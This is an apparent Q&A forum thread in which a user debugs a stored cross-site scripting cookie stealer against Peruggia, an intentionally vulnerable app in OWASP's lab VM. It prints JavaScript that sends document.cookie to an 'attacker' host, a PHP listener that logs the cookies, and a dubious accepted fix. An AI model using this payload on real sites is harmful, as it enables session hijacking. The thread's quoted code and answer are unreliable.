# GET requests are empty while trying to save user cookies with Cross Site Scripting(javascript) and PHP Listener (OWASP)

Tags: javascript, php, cookies, http-headers, apache2

I am using OWASP's VM for testing Broken Web Applications Project and running it on virtualbox.

I am also running Kali Linux 2 (2016) with Apache2 on a separate virtualbox to connect to OWASP's VM.

The application I am testing is under "Realistic, Intentionally Vulnerable Applications" - it is called Peruggia. This page allows you to leave comments.

I am trying to save the cookies of a particular session by embedding a piece of javascript code into a webpage as a comment(XSS). Since this input is not filtered, the script comment renders and runs on the web page next time it is loaded.

Here is the javascript:

```
<script>
Var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", "http://attacker/savecookie.php?cookie="+ 
document.cookie, true);
xmlHttp.send(null);
</script>
```

*** "attacker" in the above URL should be the IP address of your machine.

There is also a PHP script that I have written and is stored in the var/www/html directory.

Here is the PHP code:

```
<?php
ini_set('display_errors', 'on');
error_reporting(E_ALL | E_STRICT);

if ((isset($_GET["Cookie"]) && array_key_exists("Cookie", $_GET))
{
  var_dump($_GET["Cookie"]);
  $fp=fopen('/tmp/CookieMonster.txt','a');
  fwrite($fp,$_GET["Cookie"]."\n");
  fclose($fp);
}
?>
```

If I put a packet sniffing application in between these processes, it shows that I can load the webpage fine and receive a "200 OK" acknowledgement as a response to my GET request.

My issue is occurs when trying to access the contents of the superglobal array $_GET. I want to save only the cookie, however I first check if the $_GET array contains an index called "cookie." (I have also tried naming it Cookie, no difference).

The strange problem I have encountered and cannot solve (for a few days now), is why this get request receives a "200 OK" response, however it never actually stores any information ($_GET, $_POST, $_REQUEST are all empty).

The only action I have gotten is an injection of 1 byte of whitespace into my file CookieMonster.txt, which is absolutely perplexing.

I have enabled PHP in etc/apache2 config files.

I have put my script in the var/www/html directory and changed permissions accordingly.

I have put CookieMonster.txt in tmp with proper permissions set.

Please let me know if you see any problems or have any idea as to what is going wrong. I am open to suggestions. Thank you in advance for your time and help! It is much appreciated.

Comment: Far as I can tell, the `exit;` is stopping your script from further executing.

Comment: You're also doing `?cookie` yet trying to retrieve `$_GET["Cookie"]` - Two different animals here. Your script is a bit confusing as to which one you want to use.

Comment: see the answer(s) below if my comments are not helping

Comment: My code was originally only the second if-statement. The problem is I am not sure if the index is "cookie" or "Cookie" for the $_GET array.

Comment: I have posted my simplified PHP script, still same error.

Comment: look at your developer console and see if there's anything from php's error reporting

Comment: Hello Fred -ii- thank you for your help! I have checked both the apache logs and php error log - neither contain any useful information. My confusion is related to why I cannot capture header information. I know the javascript is embedded in the webpage because if I right click and inspect the html I see my script code. Then, when I reload the webpage, my php script should run and capture the cookies in tmp/CookieMonster.txt. The issue is that my php GET request seems to never return the cookies, or any data.. When I use wireshark or netcat I can see the get header with cookie info Ok'd

Comment: You're welcome. You mention here that you can't capture the header information; you removed that in an edit. I think you should rollback to your original post to include all that and have a look at the manual on using `headers_list()` http://php.net/manual/en/function.headers-list.php - Btw, you are using this off a webserver or as `http://localhost/file.php` and not `file://`, correct?

Comment: Yes I removed the case:    if (!headers_sent())    because no matter what, no headers are sent so my code always exits.   Also, I am running this on apache2

Answer (score 0):

Thank you very much for your responses and help.

The answer was painfully simple. For some odd reason, the "cookie" index within $_GET was not returning anything.

Once I removed the quotes around the cookie index, everything started working.

Maybe this is why apache2 has PHP disabled by default.

Cheers!